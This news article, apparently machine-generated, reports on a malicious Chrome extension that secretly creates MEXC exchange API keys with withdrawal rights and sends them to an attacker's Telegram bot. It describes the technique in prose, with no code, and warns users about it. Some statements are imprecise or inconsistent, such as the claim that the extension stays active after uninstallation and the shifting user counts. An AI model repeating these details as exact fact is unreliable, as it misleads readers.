Ethical Hacking News
Malicious Chrome Extension Steals MEXC API Keys: A Threat to Cryptocurrency Exchange Security
MEXC API Automator, a Google Chrome extension, has been designed to steal API keys associated with MEXC. The extension creates new API keys, enables withdrawal permissions, and exfiltrates the resulting API key and secret to a hardcoded Telegram bot. Installed on over 29 users as of writing, it was published by "jorjortan142" in September 2025 with misleading descriptions. The threat actor bypasses traditional controls using an already authenticated browser session, allowing them to control any MEXC account accessed from the compromised browser. The extension remains active even after uninstallation due to its ability to retain API keys in a valid and not revoked state.
In a recent revelation, cybersecurity researchers have shed light on a malicious Google Chrome extension that has been designed to steal API keys associated with MEXC, a popular centralized cryptocurrency exchange available in over 170 countries. The extension, named MEXC API Automator, has been masquerading as a tool to automate trading on the platform, but its true intention is far more sinister.
According to cybersecurity expert Kirill Boychenko, the extension programmatically creates new MEXC API keys, enables withdrawal permissions, hides that permission in the user interface (UI), and exfiltrates the resulting API key and secret to a hardcoded Telegram bot controlled by the threat actor. This means that once the user installs the extension and navigates to the MEXC API management page, the malicious code injects a script that creates a new API key, enables withdrawal capabilities, and transmits the values to the Telegram bot for exfiltration.
The impact of this attack is severe, as it allows the threat actor to control any MEXC account accessed from the compromised browser, granting them access to execute trades, perform automated withdrawals, drain wallets and balances, and potentially compromise user accounts. The extension's ability to bypass traditional controls and leverage an already authenticated browser session makes it a formidable threat.
The malicious extension has been available on the Chrome Web Store with 29 downloads as of the time of writing. It was first published by a developer named "jorjortan142" on September 1, 2025, and was described as an extension that simplifies connecting your trading bot to the MEXC exchange by generating API keys with necessary permissions.
The attack is made possible by the fact that it leverages an already authenticated browser session to realize its goals, thereby obviating the need for obtaining a user's password or bypassing authentication protections. This means that even if the user uninstalls the extension from their Chrome browser, the malicious code remains active as long as the API keys are valid and not revoked.
The threat actor behind this operation is currently unknown, but a reference to "jorjortan142" points to an X handle with the same name that links to a Telegram bot named SwapSushiBot. This bot promotes various content across TikTok and YouTube, suggesting that the threat actor may be using these platforms to promote their malicious activities.
According to Boychenko, the extension is designed to target MEXC API keys at the moment they are created and configured with full permissions. By hijacking a single API workflow inside the browser, threat actors can bypass many traditional controls and go straight for long-lived API keys with withdrawal rights. This means that the same playbook used in this attack can be readily adapted to other exchanges, DeFi dashboards, broker portals, and any web console that issues tokens in session.
The fact that the extension has not been removed from the Chrome Web Store despite its malicious nature highlights a critical vulnerability in the platform's review process. It is clear that more needs to be done to ensure that extensions on the Chrome Web Store are thoroughly vetted for security risks before they become available to users.
As cybersecurity threats continue to evolve and become more sophisticated, it is essential for users to remain vigilant and take steps to protect themselves from such malicious activities. This includes keeping their software and browsers up-to-date, using reputable antivirus software, and being cautious when installing new extensions or clicking on suspicious links.
In conclusion, the MEXC API Automator extension represents a significant threat to cryptocurrency exchange security, highlighting the need for increased vigilance and awareness among users and developers alike. By understanding the tactics and techniques used by malicious actors like the one behind this extension, we can better equip ourselves to defend against similar attacks in the future.
Related Information:
https://www.ethicalhackingnews.com/articles/A-Malicious-Chrome-Extension-Steals-MEXC-API-Keys-A-Threat-to-Cryptocurrency-Exchange-Security-ehn.shtml
https://thehackernews.com/2026/01/malicious-chrome-extension-steals-mexc.html
https://cyberpress.org/malicious-chrome-extension-mexc-wallet-credential-theft/
https://socket.dev/blog/malicious-chrome-extension-steals-mexc-api-keys
Published: Tue Jan 13 11:31:58 2026 by llama3.2 3B Q4_K_M
